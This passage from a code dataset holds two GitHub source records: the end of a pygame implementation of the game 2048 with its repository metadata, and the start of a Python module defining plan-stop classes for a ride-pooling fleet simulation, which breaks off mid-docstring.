pygame.draw.circle(G.window, self.color, (x + self.r, y + self.r), self.r)\n pygame.draw.circle(G.window, self.color, (x + self.a - self.r, y + self.r), self.r)\n pygame.draw.circle(G.window, self.color, (x + self.a - self.r, y + self.a - self.r), self.r)\n pygame.draw.circle(G.window, self.color, (x + self.r, y + self.a - self.r), self.r)\n\n\nclass Cell:\n font_size = 52\n\n def __init__(self, value):\n self.value = value\n self.tile = RoundedSquare(G.cell_size - 2 * G.grid_spacing, G.radius, Colors.cell[value])\n if value:\n self.text = Text(str(value), Colors.font[value], self.font_size)\n\n def draw(self, x_real, y_real):\n self.tile.draw(x_real + G.grid_spacing, y_real + G.grid_spacing + G.H.height)\n if self.value:\n self.text.draw(x_real + (G.cell_size - self.text.width) / 2, y_real + (G.cell_size - self.text.height) / 2 + G.H.height)\n\n\nclass Animation:\n def __init__(self, row_start, col_start, row_end, col_end, value):\n self.value = value\n self.row_start = row_start\n self.col_start = col_start\n self.row_end = row_end\n self.col_end = col_end\n self.move_distance_x = (col_end - col_start) * G.cell_size\n self.move_distance_y = (row_end - row_start) * G.cell_size\n self.move_step_x = self.move_distance_x // G.move_time\n self.move_step_y = self.move_distance_y // G.move_time\n self.start_pos_x = col_start * G.cell_size\n self.start_pos_y = row_start * G.cell_size\n\n def draw(self):\n pos_now_x = self.start_pos_x + self.move_step_x * (G.move_time - G.move_time_remaining)\n pos_now_y = self.start_pos_y + self.move_step_y * (G.move_time - G.move_time_remaining)\n\n G.CellsPrerendered[self.value].draw(pos_now_x, pos_now_y)\n\n def __repr__(self):\n return f\"Anim(start=({self.row_start}, {self.col_start}, dist=({self.col_end - self.col_start}, {self.row_end - self.row_start}))\"\n\n\nclass Header:\n height = 80\n font_size = 39\n\n def __init__(self):\n pass\n\n def draw(self):\n pygame.draw.rect(G.window, Colors.header, (0, 0, G.dim, self.height))\n text = Text(f\"score: {G.score}\", Colors.header_font, self.font_size)\n text.draw((G.dim - text.width) // 2, (self.height - text.height) // 2)\n\n\nclass 
Game:\n debug_headless = False\n debug_anim = False\n debug_exit_status = None\n\n size = 4\n cell_size = 120\n dim = size * cell_size\n radius = 9\n grid_spacing = 6\n fps = 60\n values = [0] + [2 ** i for i in range(1, 11 + 1)]\n score = 0\n new_score = 0\n\n def __init__(self):\n self.M = [[0 for _ in range(self.size)] for _ in range(self.size)] # Matrix\n self.spawn_cell()\n self.spawn_cell()\n self.reset_animations()\n\n def start(self):\n self.H = Header()\n self.move_time = 60 if self.debug_anim else 20\n self.reset_animations()\n pygame.display.init()\n pygame.font.init()\n self.clock = pygame.time.Clock()\n self.window = pygame.display.set_mode((self.dim, self.dim + self.H.height), vsync=1)\n pygame.display.set_caption(\"2048\")\n self.CellsPrerendered = {i: Cell(i) for i in self.values}\n\n self.main_loop()\n\n pygame.quit()\n\n def main_loop(self):\n self.game_notOver = True\n self.move_time_remaining = 0\n dir_x, dir_y = 0, 0\n while self.game_notOver:\n self.clock.tick(self.fps)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.game_notOver = False\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_ESCAPE]:\n self.game_notOver = False\n\n if self.move_time_remaining == 0:\n if self.cells_being_animated:\n # things to be done when move ends\n self.reset_animations()\n self.spawn_cell()\n if self.score != self.new_score:\n self.score = self.new_score\n print(self.score)\n\n pressed_key = True\n if keys[pygame.K_LEFT] or keys[pygame.K_a]: # ←\n dir_x, dir_y = -1, 0\n elif keys[pygame.K_RIGHT] or keys[pygame.K_d]: # →\n dir_x, dir_y = 1, 0\n elif keys[pygame.K_UP] or keys[pygame.K_w]: # ↑\n dir_x, dir_y = 0, -1\n elif keys[pygame.K_DOWN] or keys[pygame.K_s]: # ↓\n dir_x, dir_y = 0, 1\n else:\n pressed_key = False\n\n if pressed_key:\n self.move_time_remaining = self.move_time\n self.move_matrix(dir_x, dir_y)\n\n if self.debug_anim and (keys[pygame.K_y] or keys[pygame.K_n]):\n self.debug_exit_status = keys[pygame.K_y]\n self.game_notOver = False\n else:\n self.move_time_remaining -= 1\n\n self.redraw()\n\n def redraw(self):\n G.window.fill(Colors.board_background)\n\n self.H.draw()\n\n for row, row_of_cells in enumerate(self.M):\n for col, val in enumerate(row_of_cells):\n if (row, col) in self.cells_being_animated:\n G.CellsPrerendered[0].draw(col * self.cell_size, row * self.cell_size)\n else:\n G.CellsPrerendered[val].draw(col * self.cell_size, row * self.cell_size)\n\n for anim in self.animations:\n anim.draw()\n\n pygame.display.update()\n\n def spawn_cell(self):\n if not self.debug_anim:\n free_tiles = [(row, col) for row, row_of_cells in enumerate(self.M) for col, val in enumerate(row_of_cells) if val == 0]\n row, col = random.choice(free_tiles)\n self.M[row][col] = random.choice([2, 2, 2, 2, 2, 2, 2, 2, 2, 4])\n\n def reset_animations(self):\n self.animations = set()\n self.cells_being_animated = set()\n\n def add_animation(self, row_start, col_start, row_end, col_end, value):\n if not self.debug_headless:\n self.animations.add(Animation(row_start, col_start, row_end, col_end, value))\n self.cells_being_animated.add((row_end, col_end))\n\n def move_cell(self, row_start, col_start, row_end, col_end):\n self.add_animation(row_start, col_start, row_end, col_end, self.M[row_start][col_start])\n self.M[row_end][col_end] = self.M[row_start][col_start]\n self.M[row_start][col_start] = 0\n\n def merge_cells(self, row_absorbent, col_absorbent, row_absorbed, col_absorbed):\n if not self.debug_headless:\n # ↓ absorbent animation, check if absorbent is 
not already being moved\n if (row_absorbent, col_absorbent) not in self.cells_being_animated:\n self.add_animation(row_absorbent, col_absorbent, row_absorbent, col_absorbent, self.M[row_absorbent][col_absorbent])\n # ↓ absorbed animation\n self.add_animation(row_absorbed, col_absorbed, row_absorbent, col_absorbent, self.M[row_absorbed][col_absorbed])\n\n self.M[row_absorbent][col_absorbent] *= 2\n self.M[row_absorbed][col_absorbed] = 0\n self.no_longer_mergeable.add((row_absorbent, col_absorbent))\n\n self.new_score += self.M[row_absorbent][col_absorbent]\n\n def find_maximum_movement(self, row_start, col_start, dir_x, dir_y):\n if dir_x != 0: # x direction\n col_end = col_start + dir_x\n while 0 < col_end < self.size - 1 and self.M[row_start][col_end] == 0 and (self.M[row_start][col_end + dir_x] == 0 or self.M[row_start][col_start] == self.M[row_start][col_end + dir_x]) and (row_start, col_end + dir_x) not in self.no_longer_mergeable:\n col_end += dir_x\n return col_end\n else: # y direction\n row_end = row_start + dir_y\n while 0 < row_end < self.size - 1 and self.M[row_end][col_start] == 0 and (self.M[row_end + dir_y][col_start] == 0 or self.M[row_start][col_start] == self.M[row_end + dir_y][col_start]) and (row_end + dir_y, col_start) not in self.no_longer_mergeable:\n row_end += dir_y\n return row_end\n\n def move_matrix(self, dir_x, dir_y):\n self.no_longer_mergeable = set()\n if dir_x != 0: # x direction\n for row in range(0, self.size):\n for col_start in (range(self.size - 2, -1, -1) if dir_x > 0 else range(0, self.size)):\n if self.M[row][col_start] and not ((col_start == 0 and dir_x < 0) or (col_start == self.size - 1 and dir_x > 0)):\n col_end = self.find_maximum_movement(row, col_start, dir_x, dir_y)\n if self.M[row][col_end] == 0:\n self.move_cell(row, col_start, row, col_end)\n elif self.M[row][col_start] == self.M[row][col_end] and (row, col_end) not in self.no_longer_mergeable:\n self.merge_cells(row, col_end, row, col_start)\n else: # y direction\n for col in range(0, self.size):\n for row_start in (range(self.size - 2, -1, -1) if dir_y > 0 else range(0, self.size)):\n if self.M[row_start][col] and not ((row_start == 0 and dir_y < 0) or (row_start == self.size - 1 and dir_y > 0)):\n row_end = self.find_maximum_movement(row_start, col, dir_x, dir_y)\n if self.M[row_end][col] == 0:\n self.move_cell(row_start, col, row_end, col)\n elif self.M[row_start][col] == self.M[row_end][col] and (row_end, col) not in self.no_longer_mergeable:\n self.merge_cells(row_end, col, row_start, col)\n\n\nos.chdir(os.path.dirname(__file__))\n\nG = Game()\nif __name__ == \"__main__\":\n G.start()\n", "repo_name": "rekin5320/2048", "sub_path": "game2048.py", "file_name": "game2048.py", "file_ext": "py", "file_size_in_byte": 11494, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pygame.font.Font", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 63, 
"usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 115, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.display.init", "line_number": 145, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 145, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 146, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 146, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 147, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 147, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 148, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 149, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 149, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 164, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 167, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 169, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pygame.K_y", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pygame.K_n", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pygame.K_y", "line_number": 198, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 220, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 220, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 225, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 226, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 290, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 290, "usage_type": "call"}, {"api_name": "os.path", "line_number": 290, "usage_type": "attribute"}]}
+{"seq_id": "29249680792", "text": "# -------------------------------------------------------------------------------------------------------------------- #\n# standard distribution imports\n# -----------------------------\nimport logging\n\n# additional module imports (> requirements)\n# ------------------------------------------\nimport numpy as np\nfrom abc import abstractmethod, ABCMeta\nfrom typing import List, Dict, Tuple, Optional\n\n# src imports\n# -----------\nfrom src.simulation.Legs import VehicleRouteLeg\nfrom src.simulation.Vehicles import SimulationVehicle\nfrom src.fleetctrl.planning.PlanRequest import PlanRequest\nfrom src.routing.NetworkBase import NetworkBase\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# global variables\n# ----------------\nfrom src.misc.globals import *\n\nLOG = logging.getLogger(__name__)\nLARGE_INT = 100000000\n\n\n# =================================================================================================================== #\n# ========= PLAN STOP CLASSES ======================================================================================= #\n# =================================================================================================================== #\n\n# class PlanStop:\n# def __init__(self, position, boarding_dict, max_trip_time_dict, earliest_pickup_time_dict, latest_pickup_time_dict,\n# change_nr_pax, planned_arrival_time=None, planned_departure=None, planned_arrival_soc=None,\n# locked=False, charging_power=0, started_at=None,\n# existing_vcl=None, charging_unit_id=None):\n\nclass PlanStopBase(metaclass=ABCMeta):\n \"\"\" this abstract class defines all methods a PlanStop-Class has to implement\n this class corresponds to one spatiotemporal action a vehicle is planned to do during a vehicle plan\n a vehicle plan thereby consists of an temporal ordered list of PlanStops which are performed one after another\n vehicles are moving between these different plan stops.\n \"\"\"\n \n @abstractmethod\n def get_pos(self) -> tuple:\n \"\"\"returns network position of this plan stop\n :return: network position tuple \"\"\"\n pass\n \n @abstractmethod\n def get_state(self) -> G_PLANSTOP_STATES:\n \"\"\" returns the state of the planstop \n :return: plan stop state\"\"\"\n \n @abstractmethod\n def get_list_boarding_rids(self) -> list:\n \"\"\"returns list of all request ids boarding at this plan stop\n :return: list of boarding rids\"\"\"\n \n @abstractmethod\n def get_list_alighting_rids(self) -> list:\n \"\"\" returns list of all request ids alighting at this plan stop\n :return: list of alighting rids\"\"\"\n \n @abstractmethod\n def get_charging_task_id(self) -> Tuple[int, str]:\n \"\"\" returns the id of the stationary charging process of the plan stop if present\n :return: charging task id (tuple(charging operator id, task id)); None if not present\"\"\"\n \n @abstractmethod\n def get_earliest_start_time(self) -> float:\n \"\"\" this function evaluates all time constraints and returns the\n earliest start time for the PlanStop\n :return: (float) earliest start time \"\"\"\n pass\n \n @abstractmethod\n def get_latest_start_time(self, pax_infos : dict) -> float:\n \"\"\" this function evaluates all time constraints and returns the \n latest start time of the Plan Stop.\n if maximum trip time constraints are applied, infos about boarding times are need to evaluate the\n latest drop off time constraints\n :param pax_infos: (dict) from corresponding vehicle 
plan rid -> list (boarding_time, deboarding time) (only boarding time needed)\n :return: (float) latest start time\"\"\"\n pass\n \n @abstractmethod\n def get_duration_and_earliest_departure(self) -> tuple:\n \"\"\" returns a tuple of planned stop duration and absolute earliest departure time at stop\n :return: (stop duration, earliest departure time) | None if not given\"\"\"\n \n @abstractmethod\n def get_started_at(self) -> float:\n \"\"\" this function returns the time this plan stop started at; None if not started by the vehicle yet\n :return: float of time or None\"\"\"\n \n @abstractmethod\n def get_change_nr_pax(self) -> int:\n \"\"\" get the change of person occupancy after this plan stop \n :return: change number pax (difference between boarding and deboarding persons)\"\"\"\n \n @abstractmethod\n def get_change_nr_parcels(self) -> int:\n \"\"\" get the change of parcel occupancy after this plan stop \n :return: change number parcels (difference between boarding and deboarding parcels)\"\"\"\n \n @abstractmethod\n def get_departure_time(self, start_time : float) -> float:\n \"\"\" this function returns the time the vehicle leaves the plan stop if it is started at start_time\n :param start_time: time the plan stop has been started\n :return: time vehicle is supposed to leave\"\"\"\n \n @abstractmethod\n def get_charging_power(self) -> float:\n \"\"\" returns the charging power at this plan stop \n :return: charging power\"\"\"\n \n @abstractmethod\n def get_boarding_time_constraint_dicts(self) -> Tuple[Dict, Dict, Dict, Dict]:\n \"\"\" returns a tuple of all boarding constraints dicts (rid -> time constraint)\n :return: dict earliest_boarding_time, latest_boarding_times, max_travel_times, latest_arrival_times\"\"\"\n \n @abstractmethod\n def get_planned_arrival_and_departure_time(self) -> Tuple[float, float]:\n \"\"\" returns time of arrival and departure planned within the plan\n :return: tuple of planned arrival time and planned departure time\"\"\"\n \n @abstractmethod\n def get_planned_arrival_and_departure_soc(self) -> Tuple[float, float]:\n \"\"\"returns the planned soc when arriving at plan stop\n :return: planned soc at start and end of charging process\"\"\"\n \n @abstractmethod\n def is_locked(self) -> bool:\n \"\"\"test for lock\n :return: bool True, if plan stop is locked\"\"\"\n \n @abstractmethod\n def is_locked_end(self) -> bool:\n \"\"\" ths for end lock\n :return: bool True, if plan stop is locked at end of plan stop (no insertion after this possible)\"\"\"\n \n @abstractmethod\n def is_infeasible_locked(self) -> bool:\n \"\"\" this if planstop is locked due to infeasible time constraints\n :return: True, if infeasible locked\"\"\"\n \n @abstractmethod\n def is_inactive(self) -> bool:\n \"\"\" this function evaluates if this is an inactive PlanStop (i.e. undefined duration and no tasks)\n :return: (bool) True if inactive, else False \"\"\"\n pass\n \n @abstractmethod\n def is_empty(self) -> bool:\n \"\"\" tests if nothing has to be done here and its just a routing target marker (i.e. 
reloc target)\n :return: (bool)\"\"\"\n \n @abstractmethod\n def set_locked(self, locked : bool):\n \"\"\" sets the locked state of the plan stop\n :param locked: True, if this plan stop should be locked\"\"\"\n \n @abstractmethod\n def set_infeasible_locked(self, infeasible_locked : bool):\n \"\"\" sets infeasible locked state if time constraints can no longer be fullfilled\n :param infeasible_locked: True, if infeasible locked state applied\"\"\"\n \n @abstractmethod\n def set_started_at(self, start_time : float):\n \"\"\"this function sets the time when the plan stop has been started by a vehicle\n :param start_time: float; simulation time when vehicle started the plan stop\"\"\"\n \n @abstractmethod\n def set_planned_arrival_and_departure_time(self, arrival_time : float, departure_time : float):\n \"\"\" set the planned arrival and departure time at plan stop\n :param arrival_time: time of vehicle arrival\n :param departure_time: planned time of departure\"\"\"\n \n @abstractmethod\n def set_duration_and_earliest_end_time(self, duration : float=None, earliest_end_time : float=None):\n \"\"\" can be used to reset duration and earliest end time of the plan stop (ignored if None)\n :param duration: new duration of plan stop\n :param earliest_end_time: new earliest end time of plan stop\"\"\"\n \n @abstractmethod\n def set_planned_arrival_and_departure_soc(self, arrival_soc : float, departure_soc : float):\n \"\"\" set the planned soc at arrival and departure at plan stop\n :param arrival soc: soc of vehicle at arrival\n :param departure_soc: soc at end of charging process\"\"\"\n \n @abstractmethod\n def update_rid_boarding_time_constraints(self, rid, new_earliest_pickup_time : float=None, new_latest_pickup_time : float=None):\n \"\"\" this method can be used to update boarding time constraints a request in this plan stop (if given)\n :param rid: request id\n :param new_earliest_pickup_time: new earliest pick up time constraint of rid\n :param new_latest_pickup_time: new latest pick up time constraint of rid\"\"\"\n \n @abstractmethod\n def update_rid_alighting_time_constraints(self, rid, new_maxmium_travel_time : float=None, new_latest_dropoff_time : float=None):\n \"\"\" this method can be used to update alighting time constraints a request in this plan stop (if given)\n :param rid: request id\n :param new_maxmium_travel_time: new maximum travel time constraint of rid\n :param new_latest_dropoff_time: new latest dropoff time constraint of rid\"\"\"\n \n @abstractmethod\n def copy(self):\n \"\"\" this function returns the copy of a plan stop\n :return: PlanStop copy\n \"\"\"\n pass\n\nclass PlanStop(PlanStopBase):\n \"\"\"this class corresponds to one spatiotemporal action a vehicle is planned to do during a vehicle plan\n a vehicle plan thereby consists of an temporal ordered list of PlanStops which are performed one after another\n vehicles are moving between these different plan stops.\n this class is the most general class of plan stops\"\"\"\n def __init__(self, position, boarding_dict={}, max_trip_time_dict={}, latest_arrival_time_dict={}, earliest_pickup_time_dict={}, latest_pickup_time_dict={},\n change_nr_pax=0, change_nr_parcels=0, earliest_start_time=None, latest_start_time=None, duration=None, earliest_end_time=None,\n locked=False, locked_end=False, charging_power=0, planstop_state : G_PLANSTOP_STATES=G_PLANSTOP_STATES.MIXED,\n charging_task_id: Tuple[int, str] = None, status: Optional[VRL_STATES] = None):\n \"\"\"\n :param position: network position (3 tuple) of the 
position this PlanStop takes place (target for routing)\n :param boarding_dict: dictionary with entries +1 -> list of request ids that board the vehicle there; -1 -> list of requests that alight the vehicle there\n :param max_trip_time_dict: dictionary request_id -> maximum trip time of all requests alighting at this stop to check max trip time constraint\n :param latest_arrival_time_dict: dictionary request_id -> absolute latest arrival time of all requests alighting at this stop to check latest arrival time constraint\n :param earliest_pickup_time_dict: dictionary request_id -> earliest pickup time of all requests boarding at this stop to check earliest pickup time constraint\n :param latest_pickup_time_dict: dictionary request_id -> latest pickup time of all requests boarding at this stop to check latest pickup time constraint\n :param change_nr_pax: (int) change of number of passengers at this point: number people boarding - number people alighting to check capacity constraint\n :param change_nr_parcels: (int) change of number of parcels at this point: number boarding parcels - number alighting parcels to check capacity constraint\n :param earliest_start_time: (float) absolute earliest start time this plan stop is allowed to start\n :param latest_start_time: (float) absolute latest start time this plan stop is allowed to start\n :param duration: (float) minimum duration this plan stop takes at this location\n :param earliest_end_time: (float) absolute earliest time a vehicle is allowed to leave at this plan stop\n :param locked: (bool) false by default; if true this planstop can no longer be unassigned from vehicleplan and has to be fulfilled. currently only working when also all planstops before this planstop are locked, too\n :param locked_end: (bool) false by default; if true, no planstops can be added after this planstop in the assignment algorithm and it cannot be removed by the assignment algorithm (insertions before are possible!)\n :param charging_power: optional (float); if given the vehicle is charged with this power (TODO unit!) 
while at this stop\n :param planstop_state: used to characterize the planstop state (task to do there)\n :param charging_task_id: the stationary task to be performed at the plan stop\n :param status: vehicle status while performing the current plan stop\n \"\"\"\n \n self.pos = position\n self.state = planstop_state\n \n self.boarding_dict = boarding_dict # +1: [rids] for boarding | -1: [rids] for alighting\n self.locked = locked\n self.locked_end = locked_end\n \n # charging\n self.charging_power = charging_power\n \n # parameters that define capacity constraints\n self.change_nr_pax = change_nr_pax\n self.change_nr_parcels = change_nr_parcels\n # parameters that define time constraints\n self.max_trip_time_dict = max_trip_time_dict # deboarding rid -> max_trip_time constraint\n self.latest_arrival_time_dict = latest_arrival_time_dict # deboarding rid -> latest_arrival_time constraint\n self.earliest_pickup_time_dict = earliest_pickup_time_dict # boarding rid -> earliest pickup time\n self.latest_pickup_time_dict = latest_pickup_time_dict # boarding rid -> latest pickup time\n if type(self.boarding_dict) != dict:\n raise TypeError\n if type(self.max_trip_time_dict) != dict:\n raise TypeError\n if type(self.latest_arrival_time_dict) != dict:\n raise TypeError\n if type(self.earliest_pickup_time_dict) != dict:\n raise TypeError\n if type(self.latest_pickup_time_dict) != dict:\n raise TypeError\n # constraints independent from boarding processes\n self.direct_earliest_start_time = earliest_start_time\n self.direct_latest_start_time = latest_start_time\n \n self.direct_duration = duration\n self.direct_earliest_end_time = earliest_end_time\n if duration is not None:\n x = int(self.direct_duration) # int() raises here if duration is not numeric\n \n # constraints (will be computed in update travel time by evaluating the whole plan)\n self._latest_start_time = None\n self._earliest_start_time = None \n \n # planning properties (will be set during evaluation of whole plan)\n self._planned_arrival_time = None\n self._planned_departure_time = None\n self._planned_arrival_soc = None\n self._planned_departure_soc = None\n\n self.started_at = None # is only set in update_plan\n self.infeasible_locked = False\n\n self.charging_task_id: Tuple[int, str] = charging_task_id\n \n def get_pos(self) -> tuple:\n \"\"\"returns network position of this plan stop\n :return: network position tuple \"\"\"\n return self.pos\n \n def get_state(self) -> G_PLANSTOP_STATES:\n return self.state\n \n def get_list_boarding_rids(self) -> list:\n \"\"\"returns list of all request ids boarding at this plan stop\n :return: list of boarding rids\"\"\"\n return self.boarding_dict.get(1, [])\n \n def get_list_alighting_rids(self) -> list:\n \"\"\" returns list of all request ids alighting at this plan stop\n :return: list of alighting rids\"\"\"\n return self.boarding_dict.get(-1, [])\n\n def get_charging_task_id(self) -> Tuple[int, str]:\n \"\"\" returns the id of the stationary charging process of the plan stop if present\n :return: charging task id (tuple(charging operator id, task id)); None if not present\"\"\"\n return self.charging_task_id\n\n def copy(self):\n \"\"\" this function returns the copy of a plan stop\n :return: PlanStop copy\n \"\"\"\n cp_ps = PlanStop(self.pos, boarding_dict=self.boarding_dict.copy(), max_trip_time_dict=self.max_trip_time_dict.copy(),\n latest_arrival_time_dict=self.latest_arrival_time_dict.copy(), earliest_pickup_time_dict=self.earliest_pickup_time_dict.copy(),\n latest_pickup_time_dict=self.latest_pickup_time_dict.copy(), 
change_nr_pax=self.change_nr_pax, change_nr_parcels=self.change_nr_parcels,\n earliest_start_time=self.direct_earliest_start_time, latest_start_time=self.direct_latest_start_time,\n duration=self.direct_duration, earliest_end_time=self.direct_earliest_end_time, locked=self.locked, locked_end=self.locked_end,\n charging_power=self.charging_power, charging_task_id=self.charging_task_id, planstop_state=self.state)\n cp_ps._planned_arrival_time = self._planned_arrival_time\n cp_ps._planned_departure_time = self._planned_departure_time\n cp_ps._planned_arrival_soc = self._planned_arrival_soc\n cp_ps._planned_departure_soc = self._planned_departure_soc\n cp_ps.started_at = self.started_at\n return cp_ps\n\n def get_earliest_start_time(self) -> float:\n \"\"\" this function evaluates all time constraints and returns the\n earliest start time for the PlanStop\n :return: (float) earliest start time \"\"\"\n self._earliest_start_time = -1\n if self.direct_earliest_start_time is not None and self.direct_earliest_start_time > self._earliest_start_time:\n self._earliest_start_time = self.direct_earliest_start_time\n if len(self.earliest_pickup_time_dict.values()) > 0:\n ept = np.floor(max(self.earliest_pickup_time_dict.values()))\n if ept > self._earliest_start_time:\n self._earliest_start_time = ept\n #LOG.debug(\"get earliest start time: {}\".format(str(self)))\n return self._earliest_start_time \n\n def get_latest_start_time(self, pax_infos : dict) -> float:\n \"\"\" this function evaluates all time constraints and returns the \n latest start time of the Plan Stop.\n if maximum trip time constraints are applied, infos about boarding times are needed to evaluate the\n latest drop off time constraints\n :param pax_infos: (dict) from corresponding vehicle plan rid -> list (boarding_time, deboarding time) (only boarding time needed)\n :return: (float) latest start time\"\"\"\n self._latest_start_time = LARGE_INT\n if self.direct_latest_start_time is not None and self.direct_latest_start_time < self._latest_start_time:\n self._latest_start_time = self.direct_latest_start_time\n if len(self.latest_pickup_time_dict.values()) > 0:\n la = np.ceil(min(self.latest_pickup_time_dict.values()))\n if la < self._latest_start_time:\n self._latest_start_time = la\n if len(self.max_trip_time_dict.values()) > 0:\n la = np.ceil(min((pax_infos[rid][0] + self.max_trip_time_dict[rid] for rid in self.boarding_dict.get(-1, []))))\n if la < self._latest_start_time:\n self._latest_start_time = la\n if len(self.latest_arrival_time_dict.values()) > 0:\n la = np.ceil(min(self.latest_arrival_time_dict.values()))\n if la < self._latest_start_time:\n self._latest_start_time = la\n #LOG.debug(\"get latest start time: {}\".format(str(self)))\n return self._latest_start_time\n \n def get_started_at(self) -> float:\n return self.started_at\n \n def get_change_nr_pax(self) -> int:\n return self.change_nr_pax\n \n def get_change_nr_parcels(self) -> int:\n return self.change_nr_parcels\n \n def get_departure_time(self, start_time: float) -> float:\n \"\"\" this function returns the time the vehicle leaves the plan stop if it is started at start_time\n :param start_time: time the plan stop has been started\n :return: time vehicle is supposed to leave\"\"\"\n departure_time = start_time\n if self.direct_duration is not None:\n departure_time = start_time + self.direct_duration\n if self.direct_earliest_end_time is not None and departure_time < self.direct_earliest_end_time:\n departure_time = self.direct_earliest_end_time\n return 
departure_time\n \n def get_duration_and_earliest_departure(self) -> tuple:\n return self.direct_duration, self.direct_earliest_end_time\n \n def get_charging_power(self) -> float:\n return self.charging_power\n \n def get_boarding_time_constraint_dicts(self) -> Tuple[Dict, Dict, Dict, Dict]:\n return self.earliest_pickup_time_dict, self.latest_pickup_time_dict, self.max_trip_time_dict, self.latest_arrival_time_dict\n\n def get_planned_arrival_and_departure_time(self) -> Tuple[float, float]:\n return self._planned_arrival_time, self._planned_departure_time\n \n def get_planned_arrival_and_departure_soc(self) -> Tuple[float, float]:\n return self._planned_arrival_soc, self._planned_departure_soc\n\n def is_inactive(self) -> bool:\n \"\"\" this function evaluates if this is an inactive PlanStop (i.e. undefined duration and no tasks)\n :return: (bool) True if inactive, else False \"\"\"\n if self.state == G_PLANSTOP_STATES.INACTIVE or self.get_departure_time(0) > LARGE_INT:\n return True\n else:\n return False\n \n def is_locked(self) -> bool:\n return self.locked\n \n def is_locked_end(self) -> bool:\n return self.locked_end\n \n def is_infeasible_locked(self) -> bool:\n return self.infeasible_locked\n \n def set_locked(self, locked: bool):\n self.locked = locked\n \n def set_infeasible_locked(self, infeasible_locked: bool):\n self.infeasible_locked = infeasible_locked\n \n def set_started_at(self, start_time: float):\n self.started_at = start_time\n \n def set_planned_arrival_and_departure_soc(self, arrival_soc: float, departure_soc: float):\n self._planned_arrival_soc = arrival_soc\n self._planned_departure_soc = departure_soc\n \n def set_planned_arrival_and_departure_time(self, arrival_time: float, departure_time: float):\n self._planned_arrival_time = arrival_time\n self._planned_departure_time = departure_time\n \n def set_duration_and_earliest_end_time(self, duration: float = None, earliest_end_time: float = None):\n if duration is not None:\n self.direct_duration = duration\n if earliest_end_time is not None:\n self.direct_earliest_end_time = earliest_end_time\n \n def update_rid_boarding_time_constraints(self, rid, new_earliest_pickup_time: float = None, new_latest_pickup_time: float = None):\n if new_earliest_pickup_time is not None:\n self.earliest_pickup_time_dict[rid] = new_earliest_pickup_time\n if new_latest_pickup_time is not None:\n self.latest_pickup_time_dict[rid] = new_latest_pickup_time\n \n def update_rid_alighting_time_constraints(self, rid, new_maxmium_travel_time: float = None, new_latest_dropoff_time: float = None):\n if new_maxmium_travel_time is not None:\n self.max_trip_time_dict[rid] = new_maxmium_travel_time\n if new_latest_dropoff_time is not None:\n self.latest_arrival_time_dict[rid] = new_latest_dropoff_time\n\n def __str__(self):\n return f\"PS: {self.pos} state {self.state.name} locked {self.locked} bd {self.boarding_dict} earl dep {self._earliest_start_time} latest arr \" \\\n f\"{self._latest_start_time} eta {self._planned_arrival_time}\"\n\n def is_empty(self) -> bool:\n \"\"\" tests if nothing has to be done here and it's just a routing target marker (i.e. 
